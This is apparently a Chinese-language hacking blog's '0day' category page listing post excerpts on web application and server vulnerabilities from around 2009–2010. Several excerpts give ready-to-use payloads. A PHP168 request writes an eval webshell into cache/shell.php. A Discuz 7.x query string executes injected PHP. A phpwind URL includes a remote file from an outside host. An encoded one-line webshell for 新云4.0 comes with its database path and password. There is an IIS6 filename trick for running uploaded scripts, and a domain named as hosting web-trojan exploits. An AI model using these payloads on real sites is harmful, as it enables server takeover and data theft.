分类: 0day 预览模式: 普通 | 列表

dedecms v5.3-v5.6 Get Shell 0day利用分析

author:toby57
team:www.wolvez.org

此0day已经出现了相当长一段时间,今天配合小龙同学提供的日志看了下代码,了解了漏洞成因。大多同学对成因不感兴趣,这儿就只公布利用方法。

查看更多...

分类:0day | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 324
测试方法:
首先,我们把需要下载的文件名改用base64_encode形式。如下:

php168/mysql_config.php  

查看更多...

分类:0day | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 459

IIS源码泄露及文件类型解析错误

漏洞介绍:IIS是微软推出的一款webserver,使用较为广泛,在支持asp/asp.net的同时还可以较好的支持PHP等其他语言的运行。但是80sec发现在IIS的较高版本中存在一个比较严重的安全问题,在按照网络上提供的默认配置情况下可能导致服务器泄露服务器端脚本源码,也可能错误的将任何类型的文件以PHP的方式进行解析,使得恶意的攻击者可能攻陷支持PHP的IIS服务器,特别是虚拟主机用户可能受的影响较大。


漏洞分析:
IIS支持以CGI的方式运行PHP,但是此种模式下,IIS处理请求的时候可能导致一些同80sec提到的nginx安全漏洞一样的问题,任何用户可以远程将任何类型的文件以PHP的方式去解析,你可以通过查看Phpinfo中对php的支持方式,其中如果为CGI/FAST-CGI就可能存在这个问题。

查看更多...

分类:0day | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 431
国内顶级安全团队80sec于5.20日下午6点发布了一个关于nginx的漏洞通告,由于该漏洞的存在,使用nginx+php组建的网站只要允许上传图片就可能被黑客入侵,直到5.21日凌晨,nginx尚未发布修复该漏洞的补丁;已经有一些网站被黑了,管理员速修复!


根据Netcraft的统计,直到2010年4月,全球一共有1300万台服务器运行着nginx程序;非常保守的估计,其中至少有600万台服务器运行着nginx并启用了php支持;继续保守的估计,其中有1/6,也就是100万台服务器允许用户上传图片。

查看更多...

分类:0day | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 539

php168获取管理员漏洞0day

作者:Amxking
漏洞程序:php168
风险等级:高
漏洞描述:
由于php168程序对用户组权限购买处理不当,使普通用户具有购买管理员权限 ,从而获得管理权限 。

查看更多...

分类:0day | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 519

dedecms爆路径最新漏洞(6个地址)

漏洞描述:
dedecms 5.5程序泄露网站路径信息。

测试地址:

查看更多...

分类:0day | 固定链接 | 评论: 2 | 引用: 0 | 查看次数: 657

Uchome <=2.0 后台GetWebShell 漏洞

本文作者:陆羽 、Oldjun
漏洞介绍:uchome<=2.0的程序中js.php文件存在代码执行漏洞,原因是正则匹配时引号使用不当,导致可以任意提交并执行PHP代码。
Php中单引号与双引号是有区别的:
" "双引号里面的字段会经过编译器解释,然后再当作HTML代码输出。
' '单引号里面的不进行解释,直接输出。

查看更多...

分类:0day | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 308
刚刚在xp sp3下测试蓝屏了   但在2003下测试成功了 刚刚测试win2008也成功了
先放威望再继续看看 免得等下无效那就。。。


谷歌工程师首发:windows最新0day 本地提谷歌果然卧虎藏龙,存在17年的漏洞编译至今通杀

查看更多...

Tags: 0day exp windows 谷歌 本地提权

分类:0day | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 1409

phpwind7.5 0day

终于看到有人发了利用  
http://www.xxx.com/apps/groups/index.php?route=groups&basePath=http://wjs001.3.xjp.77169.net/x.txt?

测试可行     过年了  黑客都出来活动了

查看更多...

分类:0day | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 791

Discuz! 7.1 & 7.2 远程代码执行漏洞

注册用户后  提交:misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}

任意执行的0day

exp:

查看更多...

分类:0day | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 841

新云4.0最新0day

访问ask目录,注册用户,
在密码问题的地方插入加密后的一句话:┼攠數畣整爠煥敵瑳∨≡┩愾
注册成功后连接默认数据库:ask/data/ask_newasp.asa 密码:a

查看更多...

Tags: 新云4.0 0day

分类:0day | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 915

PHP168 6.0及以下版本漏洞

影响版本:PHP168 6.0以下版本
入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限.
测试语句:
login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=<?php%20@eval($_POST[a]);?>
shell地址:cache/shell.php

查看更多...

Tags: php168 漏洞 shell

分类:0day | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 940

IIS6文件格式解析漏洞

必须是在IIS6环境下,第二上传文件的站点不会更改上传后的文件名,改了就没得玩了..
然后把马儿更名为xxx.asp;xxx.jpg,xxx.php;xxx.jpg也行的通,上传后直接会以asp/php等可执行文件格式打开,
貌似xxx.asp;jpg也是可以的

查看更多...

Tags: iis6 文件格式 解析

分类:0day | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 960

BDATuner.MPEG2TuneRequest新漏洞

发现日期:2009-7-4

被挂马网站: 8oy4t.8866.org
挂马页: hxxp://8oy4t.8866.org/aa/go.jpg
漏洞名: BDATuner.MPEG2TuneRequest Stack Overflow Exploit

查看更多...

Tags: 0day 漏洞 网马

分类:0day | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 1464